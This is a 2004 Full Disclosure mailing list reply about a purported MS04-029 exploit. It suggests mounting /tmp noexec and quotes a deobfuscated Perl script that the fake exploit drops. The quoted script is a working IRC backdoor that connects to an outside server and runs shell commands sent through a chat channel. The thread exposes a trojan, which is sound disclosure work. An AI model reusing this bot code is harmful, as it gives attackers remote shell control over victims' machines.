Full Disclosure mailing list archives
Re: New Remote Windows Exploit (MS04-029)
From: Rodrigo Barbosa <rodrigob () suespammers org>
Date: Thu, 4 Nov 2004 15:33:38 -0200
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Does anyone still have /tmp without noexec ? /dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid) On Wed, Nov 03, 2004 at 10:58:54PM -0500, Brendan Dolan-Gavitt wrote:
Here's a rather tidier version of the perl it drops in /tmp/hi, courtesy of PerlTidy.
#!/usr/bin/perl $chan = "#0x"; $nick = "k"; $server = "ir3ip.net"; $SIG{TERM} = {}; exit if fork; use IO::Socket; $sock = IO::Socket::INET->new( $server . ":6667" ) || exit; print $sock "USER k +i k :kv1\nNICK k\n"; $i = 1; while ( <$sock> =~ /^[^ ]+ ([^ ]+) / ) { $mode = $1; last if $mode == "001"; if ( $mode == "433" ) { $i++; $nick =~ s/\d*$/$i/; print $sock "NICK $nick\n"; } } print $sock "JOIN $chan\nPRIVMSG $chan :Hi\n"; while (<$sock>) { if (/^PING (.*)$/) { print $sock "PONG $1\nJOIN $chan\n"; } if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) { s/\s*$//; $_ = `$_`; foreach ( split "\n" ) { print $sock "PRIVMSG $chan :$_\n"; sleep 1; } } } #/tmp/hi/tmp/hi
- -- Rodrigo Barbosa <rodrigob () suespammers org> "Quid quid Latine dictum sit, altum viditur" "Be excellent to each other ..." - Bill & Ted (Wyld Stallyns) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (GNU/Linux) iD8DBQFBimfypdyWzQ5b5ckRAuUQAJ48GRrbT8dg4TuQSBmuY1gaFUFrTgCcDjAk heUfzGqMnM0K/OkuPzts0bA= =rZBE -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- New Remote Windows Exploit (MS04-029) Heikki Toivonen (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Mik Mifflin (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Heikki Toivonen (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Deigo Dude (Nov 03)
- <Possible follow-ups>
- New Remote Windows Exploit (MS04-029) Max Load (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Dave Aitel (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Heikki Toivonen (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Brendan Dolan-Gavitt (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Rodrigo Barbosa (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) Valdis . Kletnieks (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) Rodrigo Barbosa (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) Valdis . Kletnieks (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) Brent J. Nordquist (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) Valdis . Kletnieks (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) EmÃlio Wuerges (Nov 04)
- RE: New REmote Windows Exploit (MS04-029) raza (Nov 03)